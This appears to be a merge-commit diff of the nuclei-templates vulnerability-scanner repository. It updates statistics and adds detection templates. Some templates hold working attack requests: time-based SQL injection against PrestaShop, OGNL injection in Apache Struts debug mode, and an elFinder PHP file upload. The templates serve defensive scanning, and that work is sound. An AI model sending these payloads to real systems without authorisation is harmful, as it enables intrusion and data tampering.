Merge branch 'projectdiscovery:master' into wordpress-plugins
commit
75e38ef4e8
|
@ -1,3 +0,0 @@
|
|||
exposed-panels/fastpanel-hosting-control-panel.yaml
|
||||
technologies/payara-micro-server-detect.yaml
|
||||
token-spray/api-giphy.yaml
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 |
|
||||
| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 |
|
||||
| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 |
|
||||
| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 |
|
||||
| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | |
|
||||
| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | |
|
||||
| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | |
|
||||
| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | |
|
||||
| tech | 349 | princechaddha | 153 | file | 78 | | | | |
|
||||
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
|
||||
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
|
||||
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
||||
**314 directories, 4660 files**.
|
||||
**321 directories, 4733 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
4394
TEMPLATES-STATS.md
4394
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 |
|
||||
| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 |
|
||||
| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 |
|
||||
| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 |
|
||||
| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | |
|
||||
| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | |
|
||||
| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | |
|
||||
| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | |
|
||||
| tech | 349 | princechaddha | 153 | file | 78 | | | | |
|
||||
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
|
||||
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
|
||||
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
|
|
@ -1368,5 +1368,16 @@
|
|||
"website": "",
|
||||
"email": ""
|
||||
}
|
||||
},
|
||||
{
|
||||
"author": "heywoodlh",
|
||||
"links": {
|
||||
"github": "https://www.github.com/heywoodlh",
|
||||
"twitter": "",
|
||||
"linkedin": "",
|
||||
"website": "https://the-empire.systems",
|
||||
"email": ""
|
||||
}
|
||||
}
|
||||
|
||||
]
|
||||
|
|
|
@ -13,10 +13,11 @@ info:
|
|||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2008-6982
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: devalcms,xss,cms,edb
|
||||
tags: cve,cve2008,devalcms,xss,cms,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2012-0394
|
||||
|
||||
info:
|
||||
name: Apache Struts Dev Mode OGNL Injection
|
||||
author: tess
|
||||
severity: critical
|
||||
description: |
|
||||
The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
|
||||
reference:
|
||||
- https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
|
||||
- https://www.exploit-db.com/exploits/31434
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
|
||||
- http://www.exploit-db.com/exploits/18329
|
||||
classification:
|
||||
cve-id: CVE-2012-0394
|
||||
metadata:
|
||||
shodan-query: html:"Struts Problem Report"
|
||||
verified: "true"
|
||||
tags: ognl,injection,edb,cve,cve2012,apache,struts
|
||||
|
||||
variables:
|
||||
first: "{{rand_int(1000, 9999)}}"
|
||||
second: "{{rand_int(1000, 9999)}}"
|
||||
result: "{{to_number(first)*to_number(second)}}"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '{{result}}'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2016-10033
|
||||
|
||||
info:
|
||||
name: WordPress PHPMailer < 5.2.18 Remote Code Execution
|
||||
name: WordPress PHPMailer < 5.2.18 - Remote Code Execution
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-14912
|
||||
|
||||
info:
|
||||
name: cgit < 1.2.1 Directory Traversal
|
||||
name: cgit < 1.2.1 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-10232
|
||||
|
||||
info:
|
||||
name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection
|
||||
name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
|
||||
author: RedTeamBrasil
|
||||
severity: critical
|
||||
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-12314
|
||||
|
||||
info:
|
||||
name: Deltek Maconomy 2.2.5 Local File Inclusion
|
||||
name: Deltek Maconomy 2.2.5 - Local File Inclusion
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-12725
|
||||
|
||||
info:
|
||||
name: Zeroshell 3.9.0 Remote Command Execution
|
||||
name: Zeroshell 3.9.0 - Remote Command Execution
|
||||
author: dwisiswant0,akincibor
|
||||
severity: critical
|
||||
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-13101
|
||||
|
||||
info:
|
||||
name: D-Link DIR-600M Authentication Bypass
|
||||
name: D-Link DIR-600M - Authentication Bypass
|
||||
author: Suman_Kar
|
||||
severity: critical
|
||||
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-13392
|
||||
|
||||
info:
|
||||
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
|
||||
name: MindPalette NateMail 3.0.15 - Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-15107
|
||||
|
||||
info:
|
||||
name: Webmin <= 1.920 Unauthenticated Remote Command Execution
|
||||
name: Webmin <= 1.920 - Unauthenticated Remote Command Execution
|
||||
author: bp0lr
|
||||
severity: critical
|
||||
description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16313
|
||||
|
||||
info:
|
||||
name: ifw8 Router ROM v4.31 Credential Discovery
|
||||
name: ifw8 Router ROM v4.31 - Credential Discovery
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16662
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.2 Remote Code Execution
|
||||
name: rConfig 3.9.2 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.tenable.com/security/research/tra-2019-03
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-3911
|
||||
cwe-id: CWE-79
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
- https://www.cvedetails.com/cve/CVE-2019-3912
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-3912
|
||||
cwe-id: CWE-601
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-10546
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.4 SQL Injection
|
||||
name: rConfig 3.9.4 - SQL Injection
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement,
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-10547
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.4 SQL Injection
|
||||
name: rConfig 3.9.4 - SQL Injection
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-11991
|
||||
|
||||
info:
|
||||
name: Apache Cocoon 2.1.12 XML Injection
|
||||
name: Apache Cocoon 2.1.12 - XML Injection
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-13700
|
||||
|
||||
info:
|
||||
name: WordPresss acf-to-rest-api <=3.1.0- Insecure Direct Object Reference
|
||||
name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: |
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-13937
|
||||
|
||||
info:
|
||||
name: Apache Kylin Exposed Configuration File
|
||||
name: Apache Kylin - Exposed Configuration File
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
|
||||
|
|
|
@ -4,7 +4,7 @@ id: CVE-2020-25213
|
|||
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
|
||||
|
||||
info:
|
||||
name: WordPress File Manager Plugin Remote Code Execution
|
||||
name: WordPress File Manager Plugin - Remote Code Execution
|
||||
author: foulenzer
|
||||
severity: critical
|
||||
description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-25223
|
||||
|
||||
info:
|
||||
name: Sophos UTM Preauth Remote Code Execution
|
||||
name: Sophos UTM Preauth - Remote Code Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-25506
|
||||
|
||||
info:
|
||||
name: D-Link DNS-320 Unauthenticated Remote Code Execution
|
||||
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-2551
|
||||
|
||||
info:
|
||||
name: Oracle WebLogic Server Remote Code Execution
|
||||
name: Oracle WebLogic Server - Remote Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2020-26248
|
||||
|
||||
info:
|
||||
name: PrestaShop ProductComments < 4.2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
|
||||
- https://packagist.org/packages/prestashop/productcomments
|
||||
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
|
||||
cvss-score: 8.2
|
||||
cve-id: CVE-2020-26248
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,sqli,prestshop,packetstorm
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-35729
|
||||
|
||||
info:
|
||||
name: Klog Server <=2.41- Unauthenticated Command Injection
|
||||
name: Klog Server <=2.41 - Unauthenticated Command Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-35846
|
||||
|
||||
info:
|
||||
name: Agentejo Cockpit < 0.11.2 NoSQL Injection
|
||||
name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-35847
|
||||
|
||||
info:
|
||||
name: Agentejo Cockpit <0.11.2 NoSQL Injection
|
||||
name: Agentejo Cockpit <0.11.2 - NoSQL Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-20114
|
||||
|
||||
info:
|
||||
name: TCExam <= 14.8.1 Sensitive Information Exposure
|
||||
name: TCExam <= 14.8.1 - Sensitive Information Exposure
|
||||
author: push4d
|
||||
severity: high
|
||||
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-3110
|
||||
|
||||
info:
|
||||
name: PrestaShop 1.7.7.0 SQL Injection
|
||||
author: Jaimin Gondaliya
|
||||
severity: critical
|
||||
description: |
|
||||
The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
|
||||
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
|
||||
- https://www.exploit-db.com/exploits/49410
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-3110
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,prestshop,edb
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-31682
|
||||
|
||||
info:
|
||||
name: WebCTRL OEM <= 6.5 Cross-Site Scripting
|
||||
name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
|
||||
author: gy741,dhiyaneshDk
|
||||
severity: medium
|
||||
description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.
|
||||
|
|
|
@ -16,8 +16,10 @@ info:
|
|||
cve-id: CVE-2021-35587
|
||||
cwe-id: CWE-502
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: body="/oam/pages/css/login_page.css"
|
||||
tags: cve,cve2021,oam,rce,java,unauth,oracle
|
||||
shodan-query: http.title:"Oracle Access Management"
|
||||
tags: cve,cve2021,oam,rce,java,unauth,oracle,kev
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-38751
|
||||
|
||||
info:
|
||||
name: ExponentCMS <= 2.6 Host Header Injection
|
||||
name: ExponentCMS <= 2.6 - Host Header Injection
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-40438
|
||||
|
||||
info:
|
||||
name: Apache <= 2.4.48 Mod_Proxy SSRF
|
||||
name: Apache <= 2.4.48 - Mod_Proxy SSRF
|
||||
author: pdteam
|
||||
severity: critical
|
||||
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-41174
|
||||
|
||||
info:
|
||||
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
|
||||
name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
|
||||
|
|
|
@ -0,0 +1,52 @@
|
|||
id: CVE-2021-43421
|
||||
|
||||
info:
|
||||
name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
|
||||
author: akincibor
|
||||
severity: critical
|
||||
description: |
|
||||
A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
|
||||
reference:
|
||||
- https://github.com/Studio-42/elFinder/issues/3429
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
|
||||
- https://twitter.com/infosec_90/status/1455180286354919425
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-43421
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,elfinder,upload,rce,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
|
||||
- |
|
||||
GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_3, "{{randstr_1}}")'
|
||||
- "status_code == 200"
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: hash
|
||||
group: 1
|
||||
regex:
|
||||
- '"hash"\:"(.*?)"\,'
|
||||
internal: true
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-43778
|
||||
|
||||
info:
|
||||
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
|
||||
name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
|
||||
|
|
|
@ -1,20 +1,25 @@
|
|||
id: unauth-rlm
|
||||
id: CVE-2021-44152
|
||||
|
||||
info:
|
||||
name: Reprise License Manager 14.2 - Authentication Bypass
|
||||
author: Akincibor
|
||||
severity: critical
|
||||
description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
|
||||
description: |
|
||||
Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
|
||||
- https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes
|
||||
- http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-44152
|
||||
cwe-id: CWE-287
|
||||
tags: unauth,rlm,packetstorm
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"Reprise License Manager"
|
||||
google-dork: inurl:"/goforms/menu"
|
||||
tags: cve2021,rlm,auth-bypass,packetstorm,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -23,13 +28,13 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "RLM Administration Commands"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/03
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-45232
|
||||
|
||||
info:
|
||||
name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
|
||||
name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
|
||||
author: Mr-xn
|
||||
severity: critical
|
||||
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
|
||||
|
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-1883
|
||||
|
||||
info:
|
||||
name: Terraboard < 2.2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
SQL Injection in GitHub repository camptocamp/terraboard prior to 2.2.0.
|
||||
reference:
|
||||
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
|
||||
- https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc
|
||||
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2022-1883
|
||||
